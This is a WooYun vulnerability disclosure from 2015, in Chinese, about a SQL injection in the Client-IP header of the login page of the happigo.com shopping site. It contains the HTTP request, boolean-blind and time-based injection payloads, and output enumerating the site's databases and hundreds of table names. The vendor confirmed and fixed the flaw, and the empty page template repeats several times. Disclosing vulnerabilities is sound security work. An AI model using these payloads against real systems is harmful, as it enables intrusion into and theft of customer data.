快乐购物主站隐蔽SQL注射全站数据告急

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0112041

漏洞标题：快乐购物主站隐蔽SQL注射全站数据告急

漏洞作者：紫霞仙子

提交时间：2015-05-05 07:18

修复时间：2015-06-19 10:04

公开时间：2015-06-19 10:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-05：细节已通知厂商并且等待厂商处理中
2015-05-05：厂商已经确认，细节仅向厂商公开
2015-05-15：细节向核心白帽子及相关领域专家公开
2015-05-25：细节向普通白帽子公开
2015-06-04：细节向实习白帽子公开
2015-06-19：细节向公众公开

简要描述：

233

详细说明：

用户登录处
参数： Client-IP:
GET /member/login/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Client-IP: *
X-Requested-With: XMLHttpRequest
Referer: http://www.happigo.com 
Cookie: PHPSESSID=a7f7fea6f1d56066bd5283c80a7bdf59; userCartGoodsAmount=3
Host: www.happigo.com 
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

漏洞证明：

---
Parameter: Client-IP #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: -1360' OR (1853=1853) AND 'tqqg'='tqqg
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: ' AND 8843=BENCHMARK(5000000,MD5(0x6f696d70)) AND 'knrO'='knrO
---
back-end DBMS: MySQL >= 5.0.0
database management system users [17]:
****
available databases [9]:
[*] cacti
[*] cust_admin
[*] dameiren
[*] ecmall
[*] goods_admin
[*] information_schema
[*] mysql
[*] performance_schema
[*] publish
Database: goods_admin
[335 tables]
+------------------------------------+
| HBP_album                          |
| HBP_brand                          |
| HBP_news                           |
| HBP_news_ext                       |
| HBP_notice                         |
| HBP_pics                           |
| HBP_question                       |
| HBP_video_album                    |
| HBP_videos                         |
| 2014_card                          |
| 2014_order_card_error              |
| 2014_order_card                    |
| 723dongche                         |
| acti_cs                            |
| activity                           |
| activity_dt                        |
| acts                               |
| acts_comments                      |
| acts_comments_count                |
| acts_labels                        |
| acts_to_goods                      |
| acts_to_labels                     |
| add_buy_list                       |
| address                            |
| address_2015                       |
| address_20150105                   |
| address_20150417                   |
| admin_user_oplog                   |
| admin_users                        |
| advertisings                       |
| advertisings_imgs                  |
| article_list                       |
| article_list_ext                   |
| baba_category                      |
| baba_lunbo                         |
| baba_news                          |
| baba_qiandao                       |
| baba_qiandao_info                  |
| baba_voto                          |
| baba_voto_info                     |
| bank_pay_coupon                    |
| bi_all_channel_order_goods_summary |
| bi_goods_summary                   |
| bi_tv_online_goods_info            |
| bigdeal                            |
| blog                               |
| brand_adlist                       |
| brand_category                     |
| brand_goods                        |
| brand_goods_detail                 |
| brand_goods_tag                    |
| bulletins                          |
| card                               |
| card_2                             |
| category_attr_name                 |
| category_attr_value                |
| category_relation                  |
| ccb_coupon_no                      |
| checkemail_conpon                  |
| club                               |
| club_message                       |
| club_message_replay                |
| club_user                          |
| club_user_info                     |
| co_user_list                       |
| collect_goods                      |
| comment_list                       |
| comment_list_copy                  |
| comment_log                        |
| comment_top                        |
| comment_total                      |
| community_attend                   |
| community_banner                   |
| community_content                  |
| community_dynamic                  |
| community_keyword                  |
| community_point                    |
| community_praise_log               |
| community_question                 |
| community_reply                    |
| community_topic                    |
| community_user                     |
| community_user_detail              |
| community_video_comment            |
| coupon_list                        |
| coupon_temp                        |
| cust_mobile_mingxi                 |
| cust_mobile_quan                   |
| czsqlog                            |
| detailpage_dc                      |
| dmr_community                      |
| eat_area                           |
| eat_goods                          |
| eat_task                           |
| ecm_article                        |
| ecm_consume_coupon                 |
| fanli_order_log                    |
| flash_goods                        |
| flash_goods_qiangshihui            |
| flash_goods_score                  |
| flash_guoqing                      |
| flash_weekend_goods                |
| flower_post                        |
| flower_thread                      |
| flv_data                           |
| flv_data2                          |
| forward_coupon                     |
| fudai                              |
| goods_all_sale_total               |
| goods_areacheck                    |
| goods_arrival                      |
| goods_baidu_purchase               |
| goods_borghese                     |
| goods_brand                        |
| goods_brand_ext                    |
| goods_category                     |
| goods_category20140724             |
| goods_category_20120612            |
| goods_category_20150309            |
| goods_category_eyes                |
| goods_category_join                |
| goods_ccb                          |
| goods_doublebuy                    |
| goods_ext                          |
| goods_ext20141201                  |
| goods_ext_copy20130705             |
| goods_has_video0305                |
| goods_import_chk                   |
| goods_info                         |
| goods_info_set                     |
| goods_ivr                          |
| goods_kc                           |
| goods_list                         |
| goods_list20140724                 |
| goods_list20141130                 |
| goods_list_top                     |
| goods_mobile_recharge              |
| goods_on_off                       |
| goods_pic                          |
| goods_promotions_price             |
| goods_qq                           |
| goods_recommend                    |
| goods_recommend_ext                |
| goods_sail_count                   |
| goods_sailnum_allway               |
| goods_sales                        |
| goods_sales_20150310               |
| goods_sales_day                    |
| goods_sales_day_20150310           |
| goods_score_buy                    |
| goods_score_buy_copy               |
| goods_shielding                    |
| goods_showhost                     |
| goods_sku                          |
| goods_spec                         |
| goods_spec20141201                 |
| goods_spec2014120102               |
| goods_stat                         |
| goods_stock                        |
| goods_tmall                        |
| goods_tv                           |
| goods_tv_1                         |
| goods_tv_copy                      |
| goods_week_sale_total              |
| goods_yestoday_sale_total          |
| happi_tuan                         |
| happi_tuan_app                     |
| happi_tuan_brand                   |
| happynewuser                       |
| hdep_info                          |
| hn_activity                        |
| hn_comment                         |
| hn_goods                           |
| hn_merchant                        |
| hn_recommend                       |
| hn_share                           |
| hotsale_ad                         |
| hotsale_list_copy                  |
| huodong_log                        |
| hwm_stock                          |
| hwm_stock_new                      |
| hwm_stock_temp20131121             |
| icbc_qiang                         |
| index_adv                          |
| index_baokuan                      |
| index_groupbuy                     |
| index_miaosha                      |
| installment_index                  |
| installment_info                   |
| iphone4_mobile                     |
| jfhk                               |
| jfhk0517                           |
| jfhk_copy                          |
| jianhang_ka                        |
| jifen_goods                        |
| jifen_logistics                    |
| jifen_orders                       |
| jifen_questionnaire                |
| jifen_recommend                    |
| jifenmiaosha                       |
| jinxi                              |
| lifecircle_activity                |
| lifecircle_message                 |
| lifecircle_message_replay          |
| lifecircle_topic                   |
| lifecircle_users                   |
| love_donation                      |
| menu                               |
| menu_role                          |
| merchant                           |
| merchant_ext                       |
| merchant_users                     |
| mobile_home_discount               |
| netpay_info                        |
| new_article_list                   |
| new_article_list_ext               |
| numerical_mobile_goods             |
| numerical_mobile_keywords          |
| numerical_mobile_lunbo             |
| order_815                          |
| order_addr                         |
| order_card                         |
| order_card_error                   |
| order_discount                     |
| order_discount20141201             |
| order_gifts                        |
| order_goods                        |
| order_goods2010                    |
| order_goods20141211                |
| order_huanzhugege                  |
| order_invoice                      |
| order_invoice_dz                   |
| order_iphone4                      |
| order_iphone4_copy1                |
| order_iphone4_copy3                |
| order_iphone4_copy_2               |
| order_jianhang                     |
| order_jianhang_ka                  |
| order_jifenbuycard                 |
| order_jifenbuycard_copy            |
| order_miaosha                      |
| order_miaosha_copy                 |
| order_miaosha_copy1                |
| order_miaosha_copy2                |
| order_miaosha_copy3                |
| order_mobile_recharge              |
| order_mobile_recharge20141016      |
| order_mobile_recharge_qr           |
| order_no_seq                       |
| order_opinion                      |
| order_pre                          |
| order_qianggouipad                 |
| order_save_hwm_log                 |
| order_wuliangye                    |
| orders                             |
| orders20141201                     |
| orders_pro                         |
| orders_pro20141201                 |
| pay_points                         |
| pgm                                |
| pgm_article                        |
| pgm_cfs                            |
| pgm_eyes                           |
| pgm_goods                          |
| reply_list                         |
| role                               |
| sale_record                        |
| sale_top_day                       |
| sale_top_day_1125                  |
| sale_top_day_temp                  |
| sale_top_day_temp1                 |
| sale_top_month                     |
| sale_top_week                      |
| score_list                         |
| score_total                        |
| score_total_temp                   |
| sec_kill_list                      |
| send_mail                          |
| send_mes                           |
| shopping_cart                      |
| shopping_cart20131212              |
| shopping_cart_user                 |
| shopping_cart_user20131212         |
| showhost                           |
| sphinx_goods_counter               |
| store                              |
| sunorder                           |
| sunorder_img                       |
| sunorder_jl                        |
| synchronize_order                  |
| synchronize_order_goods            |
| talk_attachment                    |
| talk_forum                         |
| talk_thread                        |
| talk_threadtag                     |
| tb_orders_to_hrp                   |
| tb_val_to_val                      |
| temp_shiyong_mingdan               |
| try_apply                          |
| try_goods                          |
| try_goods_pic                      |
| try_img                            |
| try_report                         |
| tvinfo                             |
| user_coupon                        |
| user_gift_coupon                   |
| user_givequan                      |
| user_head                          |
| user_invite                        |
| user_message                       |
| user_noreg                         |
| user_quiz                          |
| user_quiz_copy                     |
| user_sandai                        |
| user_save_code                     |
| user_save_help                     |
| user_service                       |
| user_subscribe                     |
| user_suggests                      |
| user_survey                        |
| users_list                         |
| users_list20141201                 |
| users_list_4                       |
| users_login_fail                   |
| users_login_fail20141202           |
| wahaha_code                        |
| wahaha_user                        |
| will_buy                           |
| will_buy_detail                    |
| will_buy_opt                       |
| wish_goods                         |
| wx_tuijian_info                    |
| xunbao                             |
| xunbao_message                     |
| yundan_comment                     |
+------------------------------------+
还有好多数据库。。。

修复方案：

~~数据影响太大了，紧急修复吧。
求 20 rank

版权声明：转载请注明来源紫霞仙子@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-05-05 10:03

厂商回复：

谢谢路人甲对快乐购信息安全的支持！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0112041

漏洞标题：快乐购物主站隐蔽SQL注射全站数据告急

相关厂商：快乐购物股份有限公司

漏洞作者：紫霞仙子

提交时间：2015-05-05 07:18

修复时间：2015-06-19 10:04

公开时间：2015-06-19 10:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源紫霞仙子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0112041

漏洞标题：快乐购物主站隐蔽SQL注射全站数据告急

相关厂商：快乐购物股份有限公司

漏洞作者： 紫霞仙子

提交时间：2015-05-05 07:18

修复时间：2015-06-19 10:04

公开时间：2015-06-19 10:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0112041"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 紫霞仙子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：紫霞仙子

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源紫霞仙子@乌云